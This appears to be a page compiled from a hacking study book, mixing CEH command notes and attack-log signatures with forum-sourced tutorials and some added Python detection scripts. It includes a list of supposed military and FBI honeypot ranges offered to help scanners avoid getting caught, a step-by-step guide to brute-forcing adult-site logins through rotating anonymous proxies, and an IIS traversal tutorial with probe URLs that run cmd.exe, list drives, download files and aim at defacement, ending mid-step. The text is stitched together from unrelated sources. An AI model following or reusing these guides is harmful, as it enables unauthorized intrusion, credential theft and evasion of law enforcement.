The key to becoming comfortable with command line tools is to practice saying in plain language what a command is trying to instruct the computer to do. It's hard to memorize switches and far easier to understand what a tool does. As you study and find more examples, add them to this list.

NMap
nmap -sT -T5 -n -p 1-100 192.168.1.1
Use nmap to run a connect scan at a fast rate without DNS resolution against ports 1-100 at host 192.168.1.1.

Netcat
nc -v -z -w 2 192.168.1.1
Use netcat, show on the console a scan that sends packets every 2 seconds to host 192.168.1.1.

tcpdump
tcpdump -i eth0 -v -X ip proto 1
Use tcpdump to listen on interface eth0 and display layer 2 and 7 for ICMP traffic.

snort
snort -vde -c my.rules -l .
Use snort and show on the console layer 2 and 7 data using configuration file my.rules and log in this directory.

hping
hping3 -I eth0 -c 10 -a 2.2.2.2 -t 100 192.168.3.6
Use hping3 on eth0 and send 10 packets spoofing 2.2.2.2 with a TTL of 100 to host 192.168.3.6.

iptables
iptables -A FORWARD -j ACCEPT -p tcp --dport 80
Use iptables and append to the FORWARD chain a rule that will jump to the ACCEPT target when tcp traffic with a destination port of 80 is noticed.

Syntax Recognition

The CEH exam requires that you can recognize what an attack looks like from a log file. The following are examples that can be used to help explain the principles of each type of attack:

Directory Traversal
http://www.example.com/scripts/../../../../winnt/system32/cmd.exe?c+dir+c:

XSS (Cross Site Scripting)
http://www.example.com/pages/form.asp?foo=%3Cscript%3Ealert("Hacked")%3C/script%3Elang=

SQL Injection
http://www.example.com/pages/form.asp?foo=blah'+or+1+=+1+--
http://www.example.com/pages/form.asp?foo=%27%3B+insert+into+usertable+("something")%3B+--lang=
blah' or 1 = 1 --

Nimda Virus
http://www.example.com/MSADC/../../../../winnt/system32/cmd.exe?c+dir+c:

Code Red
GET /default.ida?NNNNNNNNNNN%u9090%u688%u8b00%u0000%u00=a HTTP/1.0

SNMP
OID 1.1.1.0.2.3.1.2.4.1.5.3.0.1

Buffer overflow attempt
Apr 5 02:02:09 [3432] : nops: 62.32.54.123:3211 -> 192.168.3.4:135 0x90/0x90/0x90/0x90/0x90/0x90/0x90/0x90/0x90/

Zone Transfer
Apr 5 02:02:09 [3432] : AXFR: 143.32.4.129:4865 -> 192.168.3.4:53

Enumerate email accounts
Apr 5 02:02:09 [3432] : VRFY: 78.34.65.45:5674 -> 192.168.3.4:25

Snort Signature Rule
alert tcp any any -> any any (msg:"Test Rule"; sid:1000000;)

IPTables Rule
iptables -A FORWARD -j ACCEPT -p udp --dport 53

Capture Filter
host 192.168.1.1 and host 192.168.1.2
ip proto 1

Display Filter
ip.addr == 192.168.1.1 && tcp.flags == 0x29

Hi all you scanners, you might have seen this list before. Do not scan them or you will be in Sh*t. Some of these people will actually chase up sock proxies and all that to get your IP address.
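Recognising these patterns by eye is what the exam asks for; the following Python is an added example (not the book's own code) that does the same job over log lines: it URL-decodes each line, matches one regular expression per attack type from the Syntax Recognition list, and pulls source and destination endpoints out of the IDS-style lines. The sample log lines are constructed from the book's examples and are not real traffic; the decoded-then-matched approach is the point, because the same XSS payload arrives as `%3Cscript%3E` in a web log and as `<script>` in an IDS alert.

```python
"""Recognising the attack patterns shown above in log lines.  Added example, not
from the book; the sample log lines below are constructed for the demonstration."""
import re
from urllib.parse import unquote_plus

# One compiled pattern per attack in the Syntax Recognition list.  Patterns are
# applied to the URL-decoded line so %3Cscript%3E and <script> are treated alike.
# The worm signatures come first so Nimda/Code Red are named, not just "traversal".
SIGNATURES = [
    ("Code Red (default.ida overflow)", re.compile(r"default\.ida\?N{5,}", re.I)),
    ("Nimda (MSADC traversal)", re.compile(r"/msadc/.*\.\./.*cmd\.exe", re.I)),
    ("Directory traversal", re.compile(r"(\.\./){2,}|cmd\.exe\?", re.I)),
    ("XSS", re.compile(r"<\s*script\b|javascript:", re.I)),
    ("SQL injection", re.compile(
        r"'\s*(?:or|and)\s+\S+\s*=\s*\S+"                    # blah' or 1 = 1
        r"|'\s*;\s*(?:insert|update|delete|drop|union)\b"    # '; insert into ...
        r"|\bunion\s+select\b", re.I)),
    ("Buffer overflow (NOP sled)", re.compile(r"(?:0x90/){4,}|(?:\\x90){4,}", re.I)),
    ("Zone transfer (AXFR)", re.compile(r"\bAXFR\b")),
    ("SMTP user enumeration (VRFY)", re.compile(r"\bVRFY\b")),
]

# IDS-style "src:port -> dst:port" fragment used by the nops/AXFR/VRFY lines.
ENDPOINTS = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3}):(\d+)\s*->\s*(\d{1,3}(?:\.\d{1,3}){3}):(\d+)")


def classify(line):
    """Names of every signature that matches the line (empty list if benign)."""
    decoded = unquote_plus(line)
    return [name for name, pattern in SIGNATURES if pattern.search(decoded)]


def parse_endpoints(line):
    """(src_ip, src_port, dst_ip, dst_port) from an IDS-style line, or None."""
    m = ENDPOINTS.search(line)
    if not m:
        return None
    return m.group(1), int(m.group(2)), m.group(3), int(m.group(4))


def summarize(lines):
    """Count hits per signature over a batch of log lines."""
    counts = {}
    for line in lines:
        for name in classify(line):
            counts[name] = counts.get(name, 0) + 1
    return counts


# Constructed sample: the book's example requests rewritten as log lines, plus one benign line.
SAMPLE_LOG = [
    "GET /scripts/../../../../winnt/system32/cmd.exe?c+dir+c: HTTP/1.0",
    'GET /pages/form.asp?foo=%3Cscript%3Ealert("Hacked")%3C/script%3Elang= HTTP/1.0',
    "GET /pages/form.asp?foo=blah'+or+1+=+1+-- HTTP/1.0",
    'GET /pages/form.asp?foo=%27%3B+insert+into+usertable+("something")%3B+--lang= HTTP/1.0',
    "GET /MSADC/../../../../winnt/system32/cmd.exe?c+dir+c: HTTP/1.0",
    "GET /default.ida?NNNNNNNNNNN%u9090%u688%u8b00%u0000%u00=a HTTP/1.0",
    "Apr 5 02:02:09 [3432] : nops: 62.32.54.123:3211 -> 192.168.3.4:135 0x90/0x90/0x90/0x90/0x90/",
    "Apr 5 02:02:09 [3432] : AXFR: 143.32.4.129:4865 -> 192.168.3.4:53",
    "Apr 5 02:02:09 [3432] : VRFY: 78.34.65.45:5674 -> 192.168.3.4:25",
    "GET /index.html HTTP/1.0",
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(classify(line) or ["benign"], line[:60])
    print(summarize(SAMPLE_LOG))
```

The Nimda line is reported under both its own name and "Directory traversal", which is the right answer: the worm is a traversal attack with a known path. These expressions are deliberately simple teaching signatures, not a substitute for maintained Snort rules, and a real deployment would also decode double-encoded and Unicode (`%c0%af`) variants before matching.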

6.*.*.* - Army Information Systems Center
21.*.*.* - US Defense Information Systems Agency
22.*.*.* - Defense Information Systems Agency
26.*.*.* - Defense Information Systems Agency
29.*.*.* - Defense Information Systems Agency
30.*.*.* - Defense Information Systems Agency
49.*.*.* - Joint Tactical Command
50.*.*.* - Joint Tactical Command
53.*.*.* - DaimlerChrysler AG
55.*.*.* - Army National Guard Bureau
62.0.0.1 - 62.30.255.255
64.224.*.*
64.225.*.*
64.226.*.*
128.47.0.0 - Army Communications Electronics Command (NET-TACTNET)
128.50.0.0 - Department of Defense (NET-COINS)
128.51.0.0 - Department of Defense (NET-COINSTNET)
128.56.0.0 - U.S. Naval Academy (NET-USNA-NET)
128.63.0.0 - Army Ballistics Research Laboratory (NET-BRL-SUBNET)
128.80.0.0 - Army Communications Electronics Command (CECOM) (NET-CECOMNET)
128.98.0.0 - 128.98.255.255 - Defence Evaluation and Research Agency (NET-DERA-UK)
128.154.0.0 - NASA Wallops Flight Facility (NET-WFF-NET)
128.155.0.0 - NASA Langley Research Center (NET-LARC-NET)
128.156.0.0 - NASA Lewis Network Control Center (NET-LERC)
128.157.0.0 - NASA Johnson Space Center (NET-JSC-NET)
128.158.0.0 - NASA Ames Research Center (NET-MSFC-NET)
128.159.0.0 - NASA Ames Research Center (NET-KSC-NET)
128.160.0.0 - Naval Research Laboratory (NET-SSCNET)
128.161.0.0 - NASA Ames Research Center (NET-NSN-NET)
128.183.0.0 - NASA Goddard Space Flight Center (NET-GSFC)
128.216.0.0 - MacDill Air Force Base (NET-CC-PRNET)

128.217.0.0 - NASA Kennedy Space Center (NET-NASA-KSC-OIS)
128.236.0.0 - U.S. Air Force Academy (NET-USAFA-NET)
139.142.*
155.7.0.0 - American Forces Information (NET-AFISHQ-NET1)
155.8.0.0 - U.S. Army Fort Gordon (NET-GORDON-NET5)
155.9.0.0 - United States Army Information Systems Command (NET-LWOOD-NET2)
155.74.0.0 - PEO STAMIS (NET-CEAP2)
155.75.0.0 - US Army Corps of Engineers (NET-CEAP3)
155.76.0.0 - PEO STAMIS (NET-CEAP4)
155.77.0.0 - PEO STAMIS (NET-CEAP5)
155.78.0.0 - PEO STAMIS (NET-CEAP6)
155.79.0.0 - US Army Corps of Engineers (NET-CEAP7)
155.80.0.0 - PEO STAMIS (NET-CEAP8)
155.81.0.0 - PEO STAMIS (NET-CEAP9)
155.82.0.0 - PEO STAMIS (NET-CEAP10)
155.83.0.0 - US Army Corps of Engineers (NET-CEAP11)
155.84.0.0 - PEO STAMIS (NET-CEAP12)
155.85.0.0 - PEO STAMIS (NET-CEAP13)
155.86.0.0 - US Army Corps of Engineers (NET-CEAP14)
155.87.0.0 - PEO STAMIS (NET-CEAP15)
155.88.0.0 - PEO STAMIS (NET-CEAP16)
155.178.0.0 - Federal Aviation Administration (NET-FAA)
155.213.0.0 - USAISC Fort Benning (NET-FTBENNNET3)
155.214.0.0 - Director of Information Management (NET-CARSON-TCACC)
155.215.0.0 - USAISC-FT DRUM (NET-DRUM-TCACCIS)
155.216.0.0 - TCACCIS Project Management Office (NET-FTDIX-TCACCI)
155.217.0.0 - Directorate of Information Management (NET-EUSTIS-EMH1)
155.218.0.0 - USAISC (NET-WVA-EMH2)
155.219.0.0 - DOIM/USAISC Fort Sill (NET-SILL-TCACCIS)
155.220.0.0 - USAISC-DOIM (NET-FTKNOX-NET4)
155.221.0.0 - USAISC-Ft Ord (NET-FTORD-NET2)
195.10.*
205.96.* - 205.103.*

207.30.* - 207.120.*
207.60.* - 207.61.* - FBI Linux server used to trap scanners
209.35.*
216.25.* <-- REAL DANGEROUS
216.247.* <-- REAL DANGEROUS
217.6.*.*
204.34.0.0 - 204.34.15.0 - IPC JAPAN (NETBLK-YOKONET)
204.34.0.0 - 204.37.255.0 - DOD Network Information Center (NIC-N-NIC7)
204.34.16.0 - 204.34.27.0 - Bureau of Medicine and Surgery (NETBLK-GREATLAKES)
204.34.32.0 - 204.34.63.0 - USACOM (NETBLK-JWID-1)
204.34.64.0 - 204.34.115.0 - DEFENSE FINANCE AND ACCOUNTING SERVICE (NETBLK-NETBLK-DFAS-OPLOC)
204.34.128.0 - DISA-Eucom / BBN-STD, Inc. (NET-REGGAE-12)
204.34.129.0 - Defense Technical Information Center (NET-UNISYS-DTIC)
204.34.130.0 - GSI (NET-SNIC)
204.34.131.0 - NSA NAPLES ITALY (NET-LEVEL2-NAPLES)
204.34.132.0 - NAVSTA ROTA SPAIN (NET-LEVEL2-ROTA)
204.34.133.0 - NAS SIGONELLA ITALY (NET-LEVEL2-SIG)
204.34.134.0 - Naval Air Warfare Center Aircraft Division (NET-JCTE-JCS)
204.34.135.0 - GSI (NET-SNIC1)
204.34.136.0 - Naval Undersea Warfare Center USRD - Orlando (NET-UWCUSRD-ORL)
204.34.137.0 - Joint Spectrum Center (JSC) (NET-JFMO-JAPAN)

139.142.153.23 : Front end portal of a security network filtering hundreds of client subscription IPs. If you find a vulnerable pub, IIS, SQL, or *nix box there, LEAVE IT ALONE.
195.10.* : (FBI's honeypot)
205.96-103.* : (FBI's honeypot)
207.30-120.* : (FBI's honeypot)
207.60-61.*.* : FBI Linux servers used to trap scanners
209.35.* : (FBI's honeypot)
212.159.40.211 : (FBI's honeypot)
212.159.41.173 : (FBI's honeypot)
212.159.0.2 : (FBI's honeypot)
212.159.1.1 : (FBI's honeypot)
212.159.1.4 : (FBI's honeypot)
212.159.1.5 : (FBI's honeypot)
212.56.107.22 : (FBI's honeypot)
212.159.33.56 : (FBI's honeypot)

216.25.* : (FBI's honeypot) REAL DANGEROUS
216.247.* : (FBI's honeypot) REAL DANGEROUS
217.6.*.* : FBI's honeypot

HoneyNet Project - http://project.honeynet.org/
Know your Enemy: HoneyNets - http://project.honeynet.org/papers/honeynet/
SANS IDS FAQ: What is a Honeypot? - http://www.sans.org/newlook/resources/IDFAQ/honeypot3.htm
Honey Pots and Intrusion Detection - http://www.sans.org/infosecFAQ/intrusion/honeypots.htm
The Deception Toolkit - http://www.all.net/dtk/index.html
An Explanation of Computer Forensics - http://www.computerforensics.net/forensics.htm
Computer Forensics - An Overview - http://www.sans.org/infosecFAQ/incident/forensics.htm
The Forensic Challenge - http://project.honeynet.org/challenge/
Forensic Computer Analysis - An Introduction - http://www.ddj.com/articles/2000/0009/0009f/0009f.htm
The Coroner's Toolkit - http://www.fish.com/tct/

WARNING: Replicon's security team is working closely with federal/state and corporate law enforcement. They will let you scan, tag, fill, or overtake the entire system. But you really have no control. They are monitoring you, accepting your every move while they profile you. Your dumbass is on Candid Camera. (The *nix box that you 'overtake' is actually a guided security emulator that runs on NT...) Let 'em record you ploppin' the newest, unreleased version of Photoshop, Windows, Lightwave, Max, Maya, Cosmo, or others and you (as well as everyone else involved in the operation - from Scanner to Downloader) will be 'profiled' for a very unhappy future...

Cracking Adult Porn Sites

Whackin it for free - or - How to crack Adult Porn sites.

Disclaimer

This is an insight into how I do it. It's not the only way and it's probably not the best way, but it's my way and it works. If it works for you, share the knowledge with those who want to learn and share the fruits of your efforts with those who want to wank!

Part 1 - How is it possible?

1) Humans love porn
2) Humans are lazy

How does this help us find a login for your favourite left-handed web site? Well.....

1) above tells us that if we take a normal red-blooded male (with more money than internet sense and a permanent hard-on) who is prepared to shell out some of his hard-earned cash on a subscription to www.stickitupmypussy.com then there is a very good chance he will also be prepared to shell out a little more on subscriptions to www.stickitupmyass.com or even www.fuckmyarmpit.com too (for when he feels like a change) - in fact he may well be a fully paid-up member of 5 or 6 adult pay sites.

2) above tells us that he does not want to have to remember 5 or 6 different login:pass combinations because it makes his brain hurt, so he will probably use the same login:pass for all of his subscriptions. So, for instance, if some person with a little more computer savvy than the administrator of one of the porn sites happens to break into that porn site's server and finds the password file, then as well as liberating lots of valid login:pass combos for that site, there is a very good chance those combos will be valid for several other sites as yet unknown.

2) above also tells us that he will probably choose a login:pass combo that is easy for him to remember - and for that read easy for anyone to guess. So there is a fairly good chance that the imaginative Login=dave Pass=dave or Login=qwerty Pass=asdfgh will be valid combos for an extraordinarily large number of sites.

So bearing all this in mind, to start your journey into the wonderful world of cracking all you need is a fair-sized list of these combos and a program that automates the process of entering them into the site's login:pass box........ or is it? There is one more very important ingredient you will need. Lots of adult sites will detect that a single person (i.e. you) is trying lots of different combos to try to gain access and will react by not allowing access from your IP address even with a valid login. They may go further and report this dubious behaviour to your ISP and may even report this attempted theft of their electronic property to the police. No 5-minute wank is worth losing your account with your ISP and possibly a large fine or worse! To get round these possible spanners in the works you will need an anonymous proxy (or realistically as big a list of anonymous proxies as you can find).

Part 2 - Where do I get these 3 essentials?

1) A brute force program - There are several good programs available to automate the task of inputting lists of login combos into a pay site via an anonymous proxy. I use Accessdiver (www.accessdiver.com) but there are others such as goldeneye, ares and hackttp. Accessdiver has many extras which make it my choice, such as a facility to find and check anonymous proxies and a tool for making combo lists.

2) A combo list - A good list is what separates the adequates from the greats. I make wordlists by doing the following: Leech passes from password sites such as www.ultrapasswords.com. Turn on channel logging in your irc client and leech passes from the logs (crackers frequently post whole lists of passes in the channel). Remember it doesn't matter if the logins no longer work for the sites they are posted for - they may well work for sites they haven't been tried on yet.

3) A list of working anonymous proxies - there are sites on the web with lists of proxies - try looking on www.neworder.box.sk or packetstormsecurity.org for proxy sites. Cracking sites will frequently have

a proxies page also. Proxy lists can also be found on irc - try asking channel ops if there is an automatic dcc trigger for an up-to-date proxy list.

Part 3 - How do I use Accessdiver to...

1) Get a decent wordlist. Fire up AD (current version is 4.76) and go to My Skill on the menu bar - set it to "expert" and never set it to anything else. Go to dictionary|web word leecher. To leech websites - in the box marked zone type in the EXACT url of the page containing the passes you wish to leech, eg http://www.ultrapasswords.com/index.html, and press the + button. Repeat this for as many pages as you wish. To leech passlists or irc logs - press the "extract logins from a file" button on the left and browse to your file, eg c:\mirc\logs\#hackedxxxpasses.log, and press open. Repeat for all local files you wish to leech. Now press the "start leeching" button. A list of combos will appear in the right-hand pane. Go to wordlist on the menu bar and remove duplicates, then press the "save to disk" button to save and "add in wordlists" to start using them straight away. You now have your first wordlist.

2) Find anonymous proxies. In AD go to proxy|web proxy leecher. To leech websites - in the url box type in the exact url of the page containing the proxies, eg http://www.proxy.com/index.html, and press the + button. Repeat this for as many pages as you wish. To leech proxylists - press the "add a file to the list which contains proxies" button on the left and browse to your proxy list, eg c:\mirc\downloads\proxylist.txt, and press open. Repeat for all local files you wish to leech. Now press the "start leeching" button. A list of proxies will appear in the right-hand pane. Press the "add these proxies in" button and select the proxy analyzer.

Go to the proxy analyzer tab, set your timeout to 15 seconds (small box at the bottom of the screen), then press the speed/accuracy tester. After this check you will see all the proxies which are no longer valid. Press the button with the brush on it and select "delete bad results and timed out". Don't be surprised if loads of your proxies are deleted at this stage - proxies die quickly. Next select all remaining proxies and press the "confidentiality tester" button. Anonymous proxies are ranked from 1 (best) to 5 (worst); delete all proxies that don't have a ranking. Select the rest (or choose the fastest ones if you have lots) and press the "add proxy" button to save your selection as the active list.

Part 4 - OK so I've got everything I need, how do I crack a website?

So you have Accessdiver up and running with your newly made wordlist and your freshly checked proxylist; how do you turn that into a members-only wankfest? Well, you're almost there. Visit the site you want to crack and find the members login url - that's the link that throws up the login and pass box, eg http://members.privategold.com/restricted. Paste that url into the "server" box at the top of the screen. Go to the settings tab and check the "let a bot retry on abnormal replies" and "always force a security test" boxes. Make sure temporisation is unchecked. Redirections mean nothing special! Go to the proxy tab and check "use web proxies". Check change proxy on redirections, fake replies and errors. Set the bots slider at the top of the screen to about 50 and press standard. You should see a "progress" box with a whole column of "401-unauthorised" replies. If so everything is going according to plan and with a bit of luck you might see a cracked login appear below the progress column. Congratulations, you just cracked your first site!!

Part 5 - What should I look for while the test is running?

Keep an eye on the progress page!
- If you want you can gradually increase the number of bots; on a 56k dialup with no other online activity you should

Page 454


Power Of Hacking速 be able to run around 75-80 bots. Too many bots will cause a sharp increase in 404 errors. If you see the 404s increasing, decrease the bots. A large number of 403 errors means the site is going to be a bit of a challenge and will probably need a lot of proxies to crack it. You can maximise the life of each proxy by checking the "rotate proxies" box on the proxy tab. The number of logins before rotating will vary from site to site and its a matter of trial and error, experience and advice to get it right. If the test seems to be going extremely slowly - give up and try another site. Some sites just weren't made to be cracked by beginners! Part 6 - Anything else I should know? This is a very basic introduction to cracking adult sites. You can't have your hand held forever so if you want to get better at it you need to put some effort into it. Play around with the program. Experiment with different functions but specifically become familiar with the exploiter facility - it can sometimes deliver golden eggs! On the web word leecher, go to the urls found tab and check the box marked extract urls during the process. Save the cracked sites found in your history. Learn how to "refresh the login status" of the sites in your history. Download a copy of Raptor and use it to compile wordlists and site lists. Keep updating your main wordlist but keep your old ones too! Some sites are not crackable using this method - the ones that do not allow the member to choose his own login or pass . iBill frequently - but not always - use this method. don't waste your time on these sites. If you enjoy cracking and you get comfortable with it - get a request manager and start doing some cracking for the group - if you are any good you'll be noticed and probably get AOPed with all the financial security and sex on tap that brings. thanks to [/B][/QUOTE] QuickQuote Whackin it for free - or - How to crack Adult Porn sites. Mail:mtahirzahid@yahoo.com
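The column of 401s, the 403s and the "rotate proxies" advice above are exactly what the site operator sees from the other side. As an added example (not from the original post and not part of AccessDiver), here is a Python detector over constructed Common Log Format lines that flags both a single address failing repeatedly and the spread-out trace a rotating proxy list leaves: many distinct addresses each failing once against one login URL inside a short window. The log lines, addresses, thresholds and the /restricted/ path are all constructed for this example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample access log in Common Log Format; nothing here comes from
# the page. Lines 1-6: one source hammering the login URL. Lines 7-14: single
# failures from eight different addresses, the pattern a rotating proxy list
# leaves. The last two lines are ordinary successful requests.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2003:10:00:00 +0000] "GET /restricted/ HTTP/1.0" 401 312
10.0.0.5 - - [12/Mar/2003:10:00:01 +0000] "GET /restricted/ HTTP/1.0" 401 312
10.0.0.5 - - [12/Mar/2003:10:00:01 +0000] "GET /restricted/ HTTP/1.0" 401 312
10.0.0.5 - - [12/Mar/2003:10:00:02 +0000] "GET /restricted/ HTTP/1.0" 401 312
10.0.0.5 - - [12/Mar/2003:10:00:03 +0000] "GET /restricted/ HTTP/1.0" 401 312
10.0.0.5 - - [12/Mar/2003:10:00:04 +0000] "GET /restricted/ HTTP/1.0" 401 312
192.0.2.10 - - [12/Mar/2003:10:05:00 +0000] "GET /restricted/ HTTP/1.0" 401 312
192.0.2.11 - - [12/Mar/2003:10:05:01 +0000] "GET /restricted/ HTTP/1.0" 401 312
192.0.2.12 - - [12/Mar/2003:10:05:01 +0000] "GET /restricted/ HTTP/1.0" 401 312
192.0.2.13 - - [12/Mar/2003:10:05:02 +0000] "GET /restricted/ HTTP/1.0" 401 312
192.0.2.14 - - [12/Mar/2003:10:05:02 +0000] "GET /restricted/ HTTP/1.0" 401 312
192.0.2.15 - - [12/Mar/2003:10:05:03 +0000] "GET /restricted/ HTTP/1.0" 401 312
192.0.2.16 - - [12/Mar/2003:10:05:03 +0000] "GET /restricted/ HTTP/1.0" 401 312
192.0.2.17 - - [12/Mar/2003:10:05:04 +0000] "GET /restricted/ HTTP/1.0" 401 312
198.51.100.7 - dave [12/Mar/2003:10:06:00 +0000] "GET /restricted/ HTTP/1.0" 200 8192
198.51.100.8 - - [12/Mar/2003:10:06:30 +0000] "GET /index.html HTTP/1.0" 200 4711
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)


def parse_line(line):
    """Parse one CLF line into a dict; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def max_in_window(times, window):
    """Largest number of timestamps that fit inside any sliding window of `window`."""
    times = sorted(times)
    best = start = 0
    for end, t in enumerate(times):
        while t - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def detect_bruteforce(lines, window=timedelta(seconds=60), per_ip_threshold=5,
                      distributed_threshold=8, min_ips=5):
    """Two rules over the 401 responses in `lines`.

    per_ip:      one address producing >= per_ip_threshold 401s inside `window`
                 (the single-source pattern a site blocks by IP address).
    distributed: one path drawing >= distributed_threshold 401s inside `window`
                 from >= min_ips distinct addresses (the rotating-proxy pattern,
                 which per-address blocking never sees).
    """
    failures_by_ip = defaultdict(list)    # ip -> [timestamps of 401s]
    failures_by_path = defaultdict(list)  # path -> [(timestamp, ip)]
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["status"] != 401:
            continue
        failures_by_ip[rec["ip"]].append(rec["ts"])
        failures_by_path[rec["path"]].append((rec["ts"], rec["ip"]))

    per_ip = []
    for ip, times in failures_by_ip.items():
        burst = max_in_window(times, window)
        if burst >= per_ip_threshold:
            per_ip.append((ip, burst))

    distributed = []
    for path, events in failures_by_path.items():
        times = [t for t, _ in events]
        ips = {ip for _, ip in events}
        if max_in_window(times, window) >= distributed_threshold and len(ips) >= min_ips:
            distributed.append((path, len(times), len(ips)))

    return {"per_ip": sorted(per_ip), "distributed": sorted(distributed)}


if __name__ == "__main__":
    for rule, hits in detect_bruteforce(SAMPLE_LOG.splitlines()).items():
        print(rule, hits)
```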

IIS Hacking Tutorial

Hacking an IIS server is pretty much like taking candy from a baby. No really, it's that easy. In this tutorial I'm going to walk you through 0wnz'ing your very own IIS server and show you how to deface the site, but I seriously don't encourage this. I don't agree with needless defacing unless it's your first time, but I'm not against defacing to stand up for your rights, punish a site with bad intentions (even though the site can be rebuilt) or to make a strong point. If you're going to use the "I defaced your site because it had bad security" line, you could just as easily mail the admin. I'm telling you all how to do this so you know how easy it is. Please don't abuse the information I give you.

Finding vulnerable servers:

There are *many, many* vulnerabilities with IIS, but I'm going to discuss one of the latest. This vulnerability allows the execution of arbitrary code. To see if a site is vulnerable try these links:

www.TARGET.com/scripts/..%255c..%25....exe?/c+dir+c:\
www.TARGET.com/msadc/..%255c..%255c....exe?/c+dir+c:\
www.TARGET.com/cgi-bin/..%255c..%25....exe?/c+dir+c:\
www.TARGET.com/samples/..%255c..%25....exe?/c+dir+c:\
www.TARGET.com/iisadmpwd/..%255c..%....exe?/c+dir+c:\
www.TARGET.com/_vti_cnf/..%255c..%2.../system32/cmd.exe?/c+dir+c:\
www.TARGET.com/_vti_bin/..%255c..%2.../system32/cmd.exe?/c+dir+c:\
www.TARGET.com/adsamples/..%255c..%.../system32/cmd.exe?/c+dir+c:\
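Every probe URL in that list depends on the server decoding the path after it has checked it, either by decoding twice (%255c becomes %5c, which becomes a backslash) or by accepting an overlong two-byte UTF-8 form of a slash (%c0%af). As an added example, not from the original tutorial, here is a Python normaliser that decodes a request path the way the flawed server did and flags what comes out; the sample paths are constructed for this example rather than copied from the list above, and the rule names are invented.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed request paths (not the page's probe list): four traversal attempts
# in the double-encoded (%255c) and overlong UTF-8 (%c0%af, %c1%9c) forms,
# followed by two harmless requests that also contain percent-encoding.
SAMPLE_PATHS = [
    "/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\\",
    "/msadc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\\",
    "/whatever/..%c0%af..%c0%af..%c0%afwinnt/system32/cmd.exe?/c%20dir%20/S%20c:\\*.txt",
    "/_vti_bin/..%c1%9c..%c1%9cwinnt/system32/cmd.exe?/c+dir+c:\\",
    "/scripts/search.asp?q=hello%20world",
    "/docs/my%20file.html",
]

# %c0xx / %c1xx with a continuation byte: a two-byte encoding of an ASCII char.
OVERLONG_RE = re.compile(r"%c[01]%[89ab][0-9a-f]", re.IGNORECASE)


def _collapse_overlong(data):
    """Map each 2-byte overlong UTF-8 sequence (lead byte C0 or C1) to the single
    ASCII byte it encodes, which is how the flawed decoder read it."""
    out = bytearray()
    i = 0
    while i < len(data):
        b = data[i]
        if b in (0xC0, 0xC1) and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(((b & 0x1F) << 6) | (data[i + 1] & 0x3F))
            i += 2
        else:
            out.append(b)
            i += 1
    return bytes(out)


def canonicalize(raw_path, rounds=2):
    """Drop the query string, percent-decode up to `rounds` times (so %255c
    reaches a backslash), collapse overlong UTF-8, and normalise \\ to /."""
    data = raw_path.split("?", 1)[0].encode("latin-1", "replace")
    for _ in range(rounds):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
    return _collapse_overlong(data).decode("latin-1").replace("\\", "/")


def audit_request(raw_path):
    """Return the canonical form of one request path and the reasons it was flagged."""
    canon = canonicalize(raw_path)
    segments = canon.split("/")
    reasons = []
    if ".." in segments:
        reasons.append("dot-dot traversal after decoding")
    if "%25" in raw_path.lower():
        reasons.append("double-encoded characters (%25)")
    if OVERLONG_RE.search(raw_path):
        reasons.append("overlong UTF-8 encoding")
    if segments[-1].lower() == "cmd.exe":
        reasons.append("request resolves to cmd.exe")
    return {"raw": raw_path, "canonical": canon, "reasons": reasons}


def flagged(paths):
    """Paths from `paths` that trip at least one rule, in input order."""
    return [r["raw"] for r in map(audit_request, paths) if r["reasons"]]


if __name__ == "__main__":
    for p in SAMPLE_PATHS:
        r = audit_request(p)
        print(r["canonical"], r["reasons"])
```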

If the server is vulnerable you should get a listing of the C drive. If none of these links work, the server probably isn't vulnerable. OK, so let's say you got a list of the C: contents; it should look something like:

Directory of c:\
11/15/02  08:50a  (DIR)  WINNT
11/15/02  09:15a  (DIR)  Program Files
11/15/02  09:20a  (DIR)  TEMP
11/15/02  09:21a  (DIR)  CPQ SYSTEM
11/15/02  09:50a  (DIR)  Inetpub
11/27/02  08:11a  (DIR)  CPQSUPSW
11/29/02  09:12a  (DIR)  CA_LIC
12/01/02  09:42a           140  server ip address.txt
04/06/02  04:44p        55,769  systemlog 06-04.txt
05/04/02  12:32p  (DIR)  test
              10 File(s)  1,159,703,933 bytes
                          1,322,123,264 bytes free

To navigate, just change the links to:

/system32/cmd.exe?/c+dir+c:\winnt

for example to navigate to the WINNT directory. To navigate to a folder such as CPQ SYSTEM you would have to put:

/system32/cmd.exe?/c+dir+c:\cpqsys~1

There must be six characters before the ~1 and no spaces (normal DOS rules). Use DOS on your own PC (or wherever there is a Win32 box); this will greatly help you when it comes to using simple commands such as copy, or listing the contents of a directory. Now, in order to find the main page of the website, we must find the webroot. The webroot is the path in which all the files for the site are held, including the main page. In my experience the webroot is usually found on the D: drive, but it can be any directory the

admin chooses. Try:

/system32/cmd.exe?/c+dir+d:\

This should list the contents of the D: drive. Also a good tip: a lot of sites have *mock* webroots, in which you think you have found the site's main page but it's not really, just a copy. You will have to visit the site and find the size of the main page and the other pages linked to it (right click and click Properties - normal Win32 trick) and then match it up with the files in the webroot to find the real main page.

Now is a good time to give you some commands that will come in useful:

To list all chosen files on the server use:
www.TARGET.com/whatever/..%c0%af..%...%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir%20/S%20c:\*.whatever

To DOWNLOAD a file use:
www.TARGET.com/whatever/..%c0%af..%...%c0%af..%c0%af/winnt/system32/cmd.exe?/c%20type\c%20c:\whatever.file
When asked "What would you like to do with this file?" choose "run this program from its current location". Choosing "save to disk" will get you a properties report of that file or something like that.

To DELETE (del) a file use:
